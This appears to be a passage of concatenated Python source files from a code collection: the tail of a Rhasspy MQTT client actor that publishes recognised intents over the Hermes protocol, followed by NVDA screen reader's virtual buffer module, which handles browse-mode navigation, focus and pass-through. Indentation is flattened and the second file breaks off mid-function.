if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.save_for_later(message, sender)
def to_connected(self, from_state: str) -> None:
"""Transition to connected state."""
assert self.client is not None
# Subscribe to topics
for topic in self.subscriptions:
self.client.subscribe(topic)
self._logger.debug("Subscribed to %s", topic)
# Publish outstanding messages
for topic, payloads in self.publications.items():
for payload in payloads:
self.client.publish(topic, payload)
self.publications.clear()
def in_connected(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connected state."""
if isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.transition("connecting")
elif isinstance(message, MessageReady):
while not self.message_queue.empty():
mqtt_message = self.message_queue.get()
for receiver in self.subscriptions[mqtt_message.topic]:
self.send(receiver, mqtt_message)
elif self.connected:
from rhasspy.intent import IntentRecognized
assert self.client is not None
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
self.client.subscribe(message.topic)
self._logger.debug("Subscribed to %s", message.topic)
elif isinstance(message, MqttPublish):
self.client.publish(message.topic, message.payload)
elif isinstance(message, IntentRecognized):
if self.publish_intents:
self.publish_intent(message.intent)
else:
self.save_for_later(message, sender)
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
if self.client is not None:
self.connected = False
self._logger.debug("Stopping MQTT client")
self.client.loop_stop()
self.client = None
# -------------------------------------------------------------------------
def save_for_later(self, message: Any, sender: RhasspyActor) -> None:
"""Cache message until connected."""
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
elif isinstance(message, MqttPublish):
self.publications[message.topic].append(message.payload)
# -------------------------------------------------------------------------
def on_connect(self, client, userdata, flags, rc):
"""Callback when connected to broker."""
try:
self._logger.info("Connected to %s:%s", self.host, self.port)
self.send(self.myAddress, MqttConnected())
except Exception:
self._logger.exception("on_connect")
def on_disconnect(self, client, userdata, flags, rc):
"""Callback when disconnected from broker."""
try:
self._logger.warning("Disconnected")
self.connected = False
self.send(self.myAddress, MqttDisconnected())
except Exception:
self._logger.exception("on_disconnect")
def on_message(self, client, userdata, msg):
"""Callback when message received."""
try:
self.message_queue.put(MqttMessage(msg.topic, msg.payload))
self.send(self.myAddress, MessageReady())
except Exception:
self._logger.exception("on_message")
# -------------------------------------------------------------------------
def publish_intent(self, intent: Dict[str, Any]) -> None:
"""Publish intent to MQTT using Hermes protocol."""
intent_name = pydash.get(intent, "intent.name", "")
not_recognized = len(intent_name) == 0
assert self.client is not None
if not_recognized:
# Publish using Hermes protocol
topic = "hermes/nlu/intentNotRecognized"
payload = json.dumps({"sessionId": "", "input": intent.get("text", "")})
else:
# Publish using Rhasspy protocol
topic = f"rhasspy/intent/{intent_name}"
payload = json.dumps(
{ev["entity"]: ev["value"] for ev in intent["entities"]}
)
self.client.publish(topic, payload)
# Publish using Hermes protocol
topic = f"hermes/intent/{intent_name}"
payload = json.dumps(
{
"sessionId": "",
"siteId": self.site_id,
"input": intent.get("text", ""),
"intent": {
"intentName": intent_name,
"confidenceScore": pydash.get(intent, "intent.confidence", 1),
},
"slots": [
{
"slotName": ev["entity"],
"confidence": 1,
"value": {"kind": ev["entity"], "value": ev["value"]},
"rawValue": ev.get("raw_value", ev["value"]),
}
for ev in intent.get("entities", [])
],
"asrTokens": [],
"asrConfidence": 1,
}
).encode()
self.client.publish(topic, payload)
self._logger.debug("Published intent to %s", topic)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems on startup."""
problems: Dict[str, Any] = {}
s = socket.socket()
try:
s.connect((self.host, self.port))
except Exception:
problems[
"Can't connect to server"
] = f"Unable to connect to your MQTT server at {self.host}:{self.port}. Is it running?"
finally:
s.close()
return problems
|
__init__.py
|
# -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2015 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(unicode):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): ur"\\:",
ord(u";"): ur"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
escape = lambda text: unicode(text).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(unicode(name))
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif values[0] is None:
# There must be no value for this attribute.
optRegexp.append(r";")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches.
optRegexp.append("(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(");")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def label(self):
if self.itemType == "landmark":
attrs = self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])
name = attrs.get("name", "")
if name:
name += " "
return name + aria.landmarkRoles[attrs["landmark"]]
else:
return super(VirtualBufferQuickNavItem,self).label
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
canActivate=True
def activate(self):
self.textInfo.obj._activatePosition(self.textInfo)
def moveTo(self):
info=self.textInfo.copy()
info.collapse()
self.document._set_selection(info,reason=browseMode.REASON_QUICKNAV)
class VirtualBufferTextInfo(textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
UNIT_CONTROLFIELD = "controlField"
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getPointFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
left, top, width, height = o.location
return textInfos.Point(left + width / 2, top + height / 2)
def _getNVDAObjectFromOffset(self,offset):
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
# Use the container in this case.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in xrange(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def _getWordOffsets(self,offset):
#Use VBuf_getBufferLineOffsets with out screen layout to find out the range of the current field
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
# Handle table row and column headers.
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
# Get the text for the header cells.
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("landmark") == "region" and not attrs.get("name"):
# We only consider region to be a landmark if it has a name.
del attrs["landmark"]
# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == self.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def getControlFieldSpeech(self, attrs, ancestorAttrs, fieldType, formatConfig=None, extraDetail=False, reason=None):
textList = []
landmark = attrs.get("landmark")
if formatConfig["reportLandmarks"] and fieldType == "start_addedToControlFieldStack" and landmark:
try:
textList.append(attrs["name"])
except KeyError:
pass
if landmark == "region":
# The word landmark is superfluous for regions.
textList.append(aria.landmarkRoles[landmark])
else:
textList.append(_("%s landmark") % aria.landmarkRoles[landmark])
textList.append(super(VirtualBufferTextInfo, self).getControlFieldSpeech(attrs, ancestorAttrs, fieldType, formatConfig, extraDetail, reason))
return " ".join(textList)
def getControlFieldBraille(self, field, ancestors, reportStart, formatConfig):
textList = []
landmark = field.get("landmark")
if formatConfig["reportLandmarks"] and reportStart and landmark and field.get("_startOfNode"):
try:
textList.append(field["name"])
except KeyError:
pass
if landmark == "region":
# The word landmark is superfluous for regions.
textList.append(aria.landmarkRoles[landmark])
else:
# Translators: This is spoken and brailled to indicate a landmark (example output: main landmark).
textList.append(_("%s landmark") % aria.landmarkRoles[landmark])
text = super(VirtualBufferTextInfo, self).getControlFieldBraille(field, ancestors, reportStart, formatConfig)
if text:
textList.append(text)
return " ".join(textList)
def _get_focusableNVDAObjectAtStart(self):
try:
item = next(self.obj._iterNodesByType("focusable", "up", self))
except StopIteration:
return self.obj.rootNVDAObject
if not item:
return self.obj.rootNVDAObject
return self.obj.getNVDAObjectFromIdentifier(*item.vbufFieldIdentifier)
def activate(self):
self.obj._activatePosition(self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(cursorManager.CursorManager, browseMode.BrowseModeTreeInterceptor, treeInterceptorHandler.DocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
programmaticScrollMayFireEvent = False
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.disableAutoPassThrough = False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self._lastFocusObj = None
self._hadFirstGainFocus = False
self._lastProgrammaticScrollTime = None
# We need to cache this because it will be unavailable once the document dies.
self.documentConstantIdentifier = self.documentConstantIdentifier
if not hasattr(self.rootNVDAObject.appModule, "_vbufRememberedCaretPositions"):
self.rootNVDAObject.appModule._vbufRememberedCaretPositions = {}
self._lastCaretPosition = None
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
self._enteringFromOutside = True
def prepare(self):
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
if not self.VBufHandle:
return
if self.shouldRememberCaretPositionAcrossLoads and self._lastCaretPosition:
try:
self.rootNVDAObject.appModule._vbufRememberedCaretPositions[self.documentConstantIdentifier] = self._lastCaretPosition
except AttributeError:
# The app module died.
pass
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(target=self._loadBuffer).start()
def _loadBuffer(self):
try:
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(self.rootNVDAObject.appModule.helperLocalBindingHandle,self.rootDocHandle,self.rootID,unicode(self.backendName))
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
speech.speakMessage(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=unicode(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
def getNVDAObjectFromIdentifier(self, docHandle, ID):
"""Retrieve an NVDAObject for a given node identifier.
Subclasses must override this method.
@param docHandle: The document handle.
@type docHandle: int
@param ID: The ID of the node.
@type ID: int
@return: The NVDAObject.
@rtype: L{NVDAObjects.NVDAObject}
"""
raise NotImplementedError
def getIdentifierFromNVDAObject(self,obj):
"""Retreaves the virtualBuffer field identifier from an NVDAObject.
@param obj: the NVDAObject to retreave the field identifier from.
@type obj: L{NVDAObject}
@returns: a the field identifier as a doc handle and ID paire.
@rtype: 2-tuple.
"""
raise NotImplementedError
def event_treeInterceptor_gainFocus(self):
"""Triggered when this virtual buffer gains focus.
This event is only fired upon entering this buffer when it was not the current buffer before.
This is different to L{event_gainFocus}, which is fired when an object inside this buffer gains focus, even if that object is in the same buffer.
"""
doSayAll=False
hadFirstGainFocus=self._hadFirstGainFocus
if not hadFirstGainFocus:
# This buffer is gaining focus for the first time.
# Fake a focus event on the focus object, as the buffer may have missed the actual focus event.
focus = api.getFocusObject()
self.event_gainFocus(focus, lambda: focus.event_gainFocus())
if not self.passThrough:
# We only set the caret position if in browse mode.
# If in focus mode, the document must have forced the focus somewhere,
# so we don't want to override it.
initialPos = self._getInitialCaretPos()
if initialPos:
self.selection = self.makeTextInfo(initialPos)
browseMode.reportPassThrough(self)
doSayAll=config.conf['virtualBuffers']['autoSayAllOnPageLoad']
self._hadFirstGainFocus = True
if not self.passThrough:
if doSayAll:
speech.speakObjectProperties(self.rootNVDAObject,name=True,states=True,reason=controlTypes.REASON_FOCUS)
sayAllHandler.readText(sayAllHandler.CURSOR_CARET)
else:
# Speak it like we would speak focus on any other document object.
# This includes when entering the treeInterceptor for the first time:
if not hadFirstGainFocus:
speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS)
else:
# And when coming in from an outside object
# #4069 But not when coming up from a non-rendered descendant.
ancestors=api.getFocusAncestors()
fdl=api.getFocusDifferenceLevel()
try:
tl=ancestors.index(self.rootNVDAObject)
except ValueError:
tl=len(ancestors)
if fdl<=tl:
speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS)
info = self.selection
if not info.isCollapsed:
speech.speakSelectionMessage(_("selected %s"), info.text)
else:
info.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(info, reason=controlTypes.REASON_CARET, unit=textInfos.UNIT_LINE)
browseMode.reportPassThrough(self)
braille.handler.handleGainFocus(self)
def event_treeInterceptor_loseFocus(self):
"""Triggered when this virtual buffer loses focus.
This event is only fired when the focus moves to a new object which is not within this virtual buffer; i.e. upon leaving this virtual buffer.
"""
def event_caret(self, obj, nextHandler):
if self.passThrough:
nextHandler()
def _activateNVDAObject(self, obj):
"""Activate an object in response to a user request.
This should generally perform the default action or click on the object.
@param obj: The object to activate.
@type obj: L{NVDAObjects.NVDAObject}
"""
obj.doAction()
def _activateLongDesc(self,controlField):
"""
Activates (presents) the long description for a particular field (usually a graphic).
@param controlField: the field who's long description should be activated. This field is guaranteed to have states containing HASLONGDESC state.
@type controlField: dict
"""
raise NotImplementedError
def _activatePosition(self, info):
obj = info.NVDAObjectAtStart
if not obj:
return
if obj.role == controlTypes.ROLE_MATH:
import mathPres
try:
return mathPres.interactWithMathMl(obj.mathMl)
except (NotImplementedError, LookupError):
pass
return
if self.shouldPassThrough(obj):
obj.setFocus()
self.passThrough = True
browseMode.reportPassThrough(self)
elif obj.role == controlTypes.ROLE_EMBEDDEDOBJECT or obj.role in self.APPLICATION_ROLES:
obj.setFocus()
speech.speakObject(obj, reason=controlTypes.REASON_FOCUS)
else:
self._activateNVDAObject(obj)
def _set_selection(self, info, reason=controlTypes.REASON_CARET):
super(VirtualBuffer, self)._set_selection(info)
if isScriptWaiting() or not info.isCollapsed:
return
# Save the last caret position for use in terminate().
# This must be done here because the buffer might be cleared just before terminate() is called,
# causing the last caret position to be lost.
caret = info.copy()
caret.collapse()
self._lastCaretPosition = caret.bookmark
review.handleCaretMove(caret)
if reason == controlTypes.REASON_FOCUS:
focusObj = api.getFocusObject()
if focusObj==self.rootNVDAObject:
return
else:
focusObj=info.focusableNVDAObjectAtStart
obj=info.NVDAObjectAtStart
if not obj:
log.debugWarning("Invalid NVDAObjectAtStart")
return
if obj==self.rootNVDAObject:
return
if focusObj and not eventHandler.isPendingEvents("gainFocus") and focusObj!=self.rootNVDAObject and focusObj != api.getFocusObject() and self._shouldSetFocusToObj(focusObj):
focusObj.setFocus()
obj.scrollIntoView()
if self.programmaticScrollMayFireEvent:
self._lastProgrammaticScrollTime = time.time()
self.passThrough=self.shouldPassThrough(focusObj,reason=reason)
# Queue the reporting of pass through mode so that it will be spoken after the actual content.
queueHandler.queueFunction(queueHandler.eventQueue, browseMode.reportPassThrough, self)
def _shouldSetFocusToObj(self, obj):
"""Determine whether an object should receive focus.
Subclasses may extend or override this method.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
"""
return obj.role not in self.APPLICATION_ROLES and obj.isFocusable and obj.role!=controlTypes.ROLE_EMBEDDEDOBJECT
def script_activateLongDesc(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand("character")
for field in reversed(info.getTextWithFields()):
if isinstance(field,textInfos.FieldCommand) and field.command=="controlStart":
states=field.field.get('states')
if states and controlTypes.STATE_HASLONGDESC in states:
self._activateLongDesc(field.field)
break
else:
# Translators: the message presented when the activateLongDescription script cannot locate a long description to activate.
ui.message(_("No long description"))
# Translators: the description for the activateLongDescription script on virtualBuffers.
script_activateLongDesc.__doc__=_("Shows the long description at this position if one is found.")
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
# Translators: the description for the refreshBuffer script on virtualBuffers.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
# Translators: Presented when use screen layout option is toggled.
speech.speakMessage(_("use screen layout on"))
else:
# Translators: Presented when use screen layout option is toggled.
speech.speakMessage(_("use screen layout off"))
# Translators: the description for the toggleScreenLayout script on virtualBuffers.
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
if nodeType == "notLinkBlock":
return self._iterNotLinkBlock(direction=direction, pos=pos)
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
return iter(())
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def shouldPassThrough(self, obj, reason=None):
"""Determine whether pass through mode should be enabled or disabled for a given object.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@param reason: The reason for this query; one of the output reasons, L{REASON_QUICKNAV}, or C{None} for manual pass through mode activation by the user.
@return: C{True} if pass through mode should be enabled, C{False} if it should be disabled.
"""
if reason and (
self.disableAutoPassThrough
or (reason == controlTypes.REASON_FOCUS and not config.conf["virtualBuffers"]["autoPassThroughOnFocusChange"])
or (reason == controlTypes.REASON_CARET and not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"])
):
# This check relates to auto pass through and auto pass through is disabled, so don't change the pass through state.
return self.passThrough
if reason == browseMode.REASON_QUICKNAV:
return False
states = obj.states
role = obj.role
# Menus sometimes get focus due to menuStart events even though they don't report as focused/focusable.
if not obj.isFocusable and controlTypes.STATE_FOCUSED not in states and role != controlTypes.ROLE_POPUPMENU:
return False
if controlTypes.STATE_READONLY in states and role not in (controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_COMBOBOX):
return False
if reason == controlTypes.REASON_CARET:
return role == controlTypes.ROLE_EDITABLETEXT or (role == controlTypes.ROLE_DOCUMENT and controlTypes.STATE_EDITABLE in states)
if reason == controlTypes.REASON_FOCUS and role in (controlTypes.ROLE_LISTITEM, controlTypes.ROLE_RADIOBUTTON, controlTypes.ROLE_TAB):
return True
if role in (controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_LIST, controlTypes.ROLE_SLIDER, controlTypes.ROLE_TABCONTROL, controlTypes.ROLE_MENUBAR, controlTypes.ROLE_POPUPMENU, controlTypes.ROLE_MENUITEM, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM, controlTypes.ROLE_SPINBUTTON, controlTypes.ROLE_TABLEROW, controlTypes.ROLE_TABLECELL, controlTypes.ROLE_TABLEROWHEADER, controlTypes.ROLE_TABLECOLUMNHEADER, controlTypes.ROLE_CHECKMENUITEM, controlTypes.ROLE_RADIOMENUITEM) or controlTypes.STATE_EDITABLE in states:
return True
if reason == controlTypes.REASON_FOCUS:
# If this is a focus change, pass through should be enabled for certain ancestor containers.
while obj and obj != self.rootNVDAObject:
